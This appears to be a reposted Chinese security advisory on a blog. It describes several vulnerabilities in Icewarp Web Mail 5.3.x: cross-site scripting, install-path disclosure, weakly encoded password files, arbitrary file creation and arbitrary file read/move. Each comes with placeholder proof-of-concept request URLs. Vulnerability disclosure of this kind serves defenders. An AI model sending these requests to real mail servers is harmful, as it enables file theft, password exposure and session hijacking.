Icewarp Web Mail存在多个安全漏洞

39 篇文章 0 订阅
38 篇文章 0 订阅

 
受影响系统:
Icewarp Web Mail 5.3.2
Icewarp Web Mail 5.3.0
描述:
--------------------------------------------------------------------------------
MERAK Mail Server使用Icewarp Web Mail作为WEB邮件系统。

Icewarp web mail存在多个安全问题,远程攻击者可以利用这些漏洞建立任意文件,进行跨站脚本,获得安装路径等攻击。

1、多个跨站脚本:

拥有帐户的远程用户,可通过如下页面进行跨站脚本攻击:

login.html
accountsettings_add.html
calendar_addnote.html
calendar_addtask.html
calendar_addevent.html

如:

http://localhost:32000/mail/login.html?username=[xss_here]
http://localhost:32000/mail/accountsettings_add.html?id=[]%26amp;Save_x=1%26amp;account[EMAIL]=hac /
ker%26amp;account[HOST]=blackhat.org%26amp;account[HOSTUSER]=hacker%26amp;account[HOSTPASS]=31337%26amp;accoun /
t[HOSTPASS2]=31337%26amp;accountid=[xss_here] http://localhost:32000/mail/calendar.html -》 /
AddNote -》 [Title]= [xss_here] http://localhost:32000/mail/calendar.html -》 AddTask /
-》 [Note]=[xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 /
[Note]=[xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 [Title]= /
[xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 [Location]= /
[xss_here]


2、安装路径泄露

拥有帐户的远程用户,可通过如下请求获得安装路径信息:

http://localhost:32000/mail/calendar_d.html?id=[sessionid]
http://localhost:32000/mail/calendar_m.html?id=[sessionid]
http://localhost:32000/mail/calendar_w.html?id=[sessionid]
http://localhost:32000/mail/calendar_y.html?id=[sessionid]


3、用户密码简单加密

users.cfg, settings.cfg (XOR), users.dat, user.dat (BASE64)中的用户密码加密非常简单,攻击者可以通过访问这些文件获得用户和管理员密码。

4、任意文件建立

远程用户可以通过提交如下请求,在系统中建立任意内容的文件,文件路径为:[MerakDir]/webmail/users/[Domain]/[User]/accounts.dat.

http://localhost:32000/mail/accountsettings_add.html?id=[sessionid]%26amp;Save_x=1%26amp;account[E /
MAIL]=hacker%26amp;account[HOST]=blackhat.org%26amp;account[HOSTUSER]=hacker%26amp;account[HOSTPASS]=313 /
37%26amp;account[HOSTPASS2]=31337%26amp;accountid=[arbitary text]

5、移动和查看系统任意文件:

拥有帐户的远程用户可以一定本地系统上的任意文件,文件会被移到[MerakDir]/webmail/users/[Domain]/[User]目录 中,并更改为import.tmp,攻击者可以查看此文件或者导出/入到地址簿。此漏洞可以用来查看任意文件内容,或进行拒绝服务攻击。

http://localhost:32000/importaction.html?id=[sessionid]%26amp;importfile=[arbitrary /
path]%26amp;action=upload%26amp;Import=1%26amp;importfile_size=1000000

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值